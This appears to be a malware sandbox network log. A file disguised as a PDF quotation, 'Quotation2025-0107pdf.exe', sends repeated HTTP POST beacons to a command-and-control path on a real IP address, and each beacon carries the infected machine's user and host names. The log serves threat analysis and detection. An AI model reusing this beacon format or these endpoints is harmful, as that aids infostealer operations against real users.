Jan 7, 2025 12:33:38.504566908 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:38.510581017 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:39.277570963 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	50116	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:39.422327995 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:39.427169085 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:40.149019003 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	50117	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:40.295356035 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:40.300156116 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:41.026386976 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	50118	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:41.173887968 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:41.178679943 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:42.068989992 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	50119	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:42.216561079 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:42.221421003 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:42.943598986 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	50120	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:43.098558903 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:43.104720116 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:43.909679890 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:43 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	50121	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:44.067322969 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:44.073014021 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:44.821574926 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	50122	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:44.973629951 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:44.978437901 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:45.693907022 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	50123	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:45.843873024 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:45.848722935 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:46.585503101 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	50124	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:46.731494904 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:46.736291885 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:47.641290903 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	50125	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:47.780200005 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:47.784972906 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:48.495321035 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	50126	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:48.637233973 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:48.642095089 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:49.400657892 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	50127	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:49.548605919 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:49.553436995 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:50.308175087 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	50128	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:50.460906982 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:50.465759039 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:51.191889048 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	50129	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:51.342359066 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:51.347193956 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:52.077549934 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.4	50130	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:52.217780113 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:52.222675085 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:53.256197929 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.4	50131	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:53.616158962 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:53.621252060 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:54.360265017 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.4	50132	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:54.514339924 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:54.519172907 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:55.261075974 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	50133	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:55.408056021 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:55.412869930 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:56.154334068 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	50134	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:56.458128929 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:56.462920904 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:57.175021887 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	50135	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:57.334798098 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
Jan 7, 2025 12:33:57.340598106 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 12:33:58.088736057 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Tue, 07 Jan 2025 11:33:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	50136	94.156.177.41	80	7772	C:\Users\user\Desktop\Quotation2025-0107pdf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:33:58.234776974 CET	243	OUT	POST /mars/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 715C4138 Content-Length: 149 Connection: close
